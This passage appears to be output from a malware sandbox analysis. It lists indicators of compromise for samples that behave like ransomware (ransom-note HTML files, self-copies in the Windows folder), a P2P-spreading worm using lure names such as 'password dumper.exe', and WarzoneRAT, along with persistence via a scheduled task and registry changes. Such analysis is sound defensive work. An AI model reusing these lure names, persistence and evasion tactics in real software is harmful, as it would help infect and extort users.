File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-24.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\EmptyView-Dark.scale-125.png	Amus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_forward_18.svg	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.GetHelp_10.2008.32311.0_x64__8wekyb3d8bbwe\Assets\contrast-black\GetHelpAppList.targetsize-24_altform-unplated_contrast-black.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\Images\PowerAutomateAppIcon.targetsize-32.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_21.21030.25003.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-20.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\SnippingTool\Assets\Square44x44Logo.targetsize-24_altform-lightunplated.png	Amus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sendforcomments_18.svg	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2020.503.58.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\CameraSplashScreen.scale-125.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\WeatherAppList.targetsize-64_altform-lightunplated_contrast-white.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\1949_20x20x32.png	Amus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.dll.config	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\utilities\lib-amd\scroll.js	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\lib-commonjs\spacing\DefaultSpacing.js	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2020.503.58.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\CameraAppList.scale-125.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\Images\FileOneNote32x32.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_1.0.38.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-36_contrast-black.png	Amus.exe
File created	C:\Program Files\gnucleus\downloads\password dumper.exe	Mantas.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-commonjs\components\GroupedList\GroupedList.js	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\utilities\lib\dom\setSSR.js	Amus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_selected_18.svg	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.32731.0_x64__8wekyb3d8bbwe\Assets\contrast-white\LargeTile.scale-125_contrast-white.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2103.1172.0_x64__8wekyb3d8bbwe\Assets\contrast-black\FeedbackHubAppList.targetsize-80.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_1.0.38.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-40_altform-lightunplated_contrast-black.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\SplashScreen.scale-125_contrast-white.png	Amus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sv_get.svg	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.42251.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\AppPackageMedTile.scale-100_contrast-black.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.32731.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-32.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\LinkedInboxMediumTile.scale-100.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-48_altform-unplated.png	Amus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\sk_get.svg	Amus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ca-es\YOUR_FILES_ARE_ENCRYPTED.HTML	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Paint_10.2104.17.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\PaintAppList.scale-125.png	Amus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.6.3102.0_x64__8wekyb3d8bbwe\Win10\Classic\Klondike.Medium.png	Amus.exe
File created	C:\Program Files\edonkey2000\incoming\nocd crack.exe	Mantas.exe
File created	C:\Program Files\grokster\my grokster\cdkey.exe	Mantas.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Paint_10.2104.17.0_x64__8wekyb3d8bbwe\Assets\PaintAppList.targetsize-36_altform-unplated.png	Amus.exe

Drops file in Windows directory 27 IoCs

Processes:

Amus.exeDuksten.exeUserOOBEBroker.exesvchost.exe

description	ioc	process
File created	C:\Windows\Ankara.exe	Amus.exe
File created	C:\Windows\m_regedit.exe	Duksten.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Messenger.exe	Amus.exe
File opened for modification	C:\Windows\My_Pictures.exe	Amus.exe
File created	C:\Windows\Cekirge.exe	Amus.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe
File created	C:\Windows\Meydanbasi.exe	Amus.exe
File created	C:\Windows\Adapazari.exe	Amus.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File created	C:\Windows\Messenger.exe	Amus.exe
File opened for modification	C:\Windows\Cekirge.exe	Amus.exe
File created	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll	svchost.exe
File opened for modification	C:\Windows\KdzEregli.exe	Amus.exe
File created	C:\Windows\My_Pictures.exe	Amus.exe
File opened for modification	C:\Windows\Pide.exe	Amus.exe
File created	C:\Windows\Anti_Virus.exe	Amus.exe
File opened for modification	C:\Windows\Anti_Virus.exe	Amus.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll	svchost.exe
File created	C:\Windows\KdzEregli.exe	Amus.exe
File opened for modification	C:\Windows\Meydanbasi.exe	Amus.exe
File created	C:\Windows\Pide.exe	Amus.exe
File opened for modification	C:\Windows\Pire.exe	Amus.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File created	C:\Windows\Pire.exe	Amus.exe
File opened for modification	C:\Windows\Ankara.exe	Amus.exe
File opened for modification	C:\Windows\Adapazari.exe	Amus.exe

Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

4520 1152 WerFault.exe YouAreAnIdiot.exe
2872 552 WerFault.exe ddraw32.dll
6600 7008 WerFault.exe Duksten.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

5936 schtasks.exe
Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

7164 timeout.exe
6876 timeout.exe
2424 timeout.exe

pid	pid_target	process	target process
4520	1152	WerFault.exe	YouAreAnIdiot.exe
2872	552	WerFault.exe	ddraw32.dll
6600	7008	WerFault.exe	Duksten.exe

pid	process
5936	schtasks.exe

pid	process
7164	timeout.exe
6876	timeout.exe
2424	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exemsedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies Internet Explorer settings 1 TTPs 29 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395196024"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "4057602192"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31102487"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe

Modifies registry class 64 IoCs

Processes:

unregmp2.exemsedge.exemsedge.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Enqueue	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Enqueue\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9800"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play\ = "&Play with Windows Media Player"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Play\NeverDefault	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Play\command\DelegateExecute = "{ed1d0fdf-4414-470a-a56d-cfb68623fc58}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\image\ShellEx\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Video\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Enqueue\ = "&Add to Windows Media Player list"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Enqueue\ = "&Add to Windows Media Player list"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Enqueue\command	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\video\shellex\ContextMenuHandlers\PlayTo	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play\command	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\command\DelegateExecute = "{ed1d0fdf-4414-470a-a56d-cfb68623fc58}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shellex\ContextMenuHandlers\PlayTo	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Enqueue\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9800"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Play	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Enqueue\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9800"	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000_Classes\Local Settings	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\video\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaRenderer:1\ShellEx\ContextMenuHandlers\{A45AEC2B-549E-405F-AF3E-C6B03C4FDFBF}\ = "Toggle DMR Authorization Handler"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play\NeverDefault	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play\NeverDefault	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play\command	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Enqueue\command	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Video\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play\command\DelegateExecute = "{ed1d0fdf-4414-470a-a56d-cfb68623fc58}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Play\ = "&Play with Windows Media Player"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\ = "&Play with Windows Media Player"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\NeverDefault	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Play\NeverDefault	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Play\command	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000_Classes\Local Settings	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Enqueue\NeverDefault	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Enqueue\command	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Play	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Enqueue\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9800"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Play\ = "&Play with Windows Media Player"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Play\command	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Enqueue	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Enqueue	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Enqueue\command	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Video\shellex\ContextMenuHandlers\PlayTo	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Enqueue\NeverDefault	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\command	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Enqueue\NeverDefault	unregmp2.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-801878912-692986033-442676226-1000\{759261E7-7073-432D-86C3-3AB6610A295A}	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaRenderer:1\ShellEx\ContextMenuHandlers\{17FC1A80-140E-4290-A64F-4A29A951A867}\ = "Open Media Sharing Handler"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Video\shellex\ContextMenuHandlers\PlayTo	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}"	unregmp2.exe

NTFS ADS 64 IoCs

Processes:

Mantas.exeWarzoneRAT.exemsedge.exe

description	ioc	process
File created	C:\Users\Admin\Documents\rap.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\iMesh .exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Morpheus .exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\KazaaUpdate.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Warcraft III NoCD Crack.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\DivX.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Microsoft Windows 2003 Serial.txt .exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Emulator.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\hotfix.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\mp3.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Christina Aguilera.scr\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Gamecube Emulator.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\GCN Emulator.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Wolfenstein.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\setup.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\XBOX.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\Mcafee Serial.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\1000 Games.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\install.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\runhidden.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\AudioCatalyst.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\roms\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\AppData\Roaming\jFvfxe.exe\:Zone.Identifier:$DATA	WarzoneRAT.exe
File created	C:\Users\Admin\Documents\kazaalite.exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\AOL Instant Messenger (AIM).exe\:Zone.Identifier:$DATA	Mantas.exe
File created	C:\Users\Admin\Documents\PerAntivirus Crack.exe\:Zone.Identifier:$DATA	Mantas.exe
